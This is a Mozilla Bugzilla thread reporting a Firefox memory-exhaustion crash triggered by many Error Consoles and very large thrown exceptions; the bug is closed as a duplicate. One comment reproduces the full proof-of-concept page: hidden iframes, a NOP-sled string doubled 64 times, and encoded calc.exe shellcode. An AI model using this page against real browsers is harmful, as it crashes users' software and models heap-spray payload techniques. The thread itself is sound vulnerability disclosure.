Closed
Bug 390090
Opened 18 years ago
Closed 18 years ago
Firefox Memory Exhaustion DoS with multiple Error Consoles
Categories
(Toolkit Graveyard :: Error Console, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 243170
People
(Reporter: sirdarckcat, Unassigned)
References
()
Details
(Keywords: crash)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
While popping a lot of Error Consoles, when throwing very large exceptions through "throw 'string'", Firefox crashes.
Reproducible: Always
Steps to Reproduce:
1. Enter to the PoC website, be aware, the PoC may crash your browser.
Actual Results:
After 2 minutes, "Memory Limit Reached" Error, and NULL Pointer Exception some seconds after that.
Expected Results:
"out of memory" exception at the console.
After 2 minutes, "Memory Limit Reached" Error, and a NULL Pointer Exception some seconds after that.
I thought in addressing this bug as critical, because "the software crashes and/or hangs", but I don't think it's really "critical", so I left it as Major bug..
|
||
Comment 1•18 years ago
|
||
confirmed in
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Comment 2•18 years ago
|
||
And it crashes Internet Explorer too :-)
The content of that page is :
<html>
<head>
<title>Firefox [Error Console+Throw] Denial of Service (by sirdarckcat)</title>
<style>
iframe{height: 1px; width: 1px; border: 0px;}
</style>
</head>
<body>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<script language="JavaScript">
var m=/*nop + nop*/unescape("%u9090");
//shellcode never get's executed.. this was just for testing.., the code of the shellcode is a simple >> calc.exe << PoC
var s=/*shellcode*/unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
m=m+m;
document.write('<script>throw m+s;</scr'+'ipt>');
}
</script>
</body>
</html>
|
||
Comment 3•18 years ago
|
||
We removed the ability for web sites to open the error console in bug 243170 on trunk only (for Firefox 3).
You're clearly hitting some kind of out-of-memory crash bug, but we have plenty of OOM crash bug reports, and this one is hard to reproduce even on branch, so I don't think it warrants special investigation. If you can figure out what the OOM crash bug is by looking at a stack trace for the crash, please file another bug report (preferably with a patch).
Severity: major → critical
Status: NEW → RESOLVED
Closed: 18 years ago
Keywords: crash
Resolution: --- → DUPLICATE
|
||
Comment 4•18 years ago
|
||
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre ID:2007072905
The URL makes my firefox take a silly ammount of memory and effectively hang too.
|
|
||
Comment 5•18 years ago
|
||
The script at the bottom looks like it's trying to fill up memory, so that's not too surprising.
|
Assignee | |
Updated•17 years ago
|
Product: Firefox → Toolkit
|
|
Assignee | |
Updated•9 years ago
|
Product: Toolkit → Toolkit Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•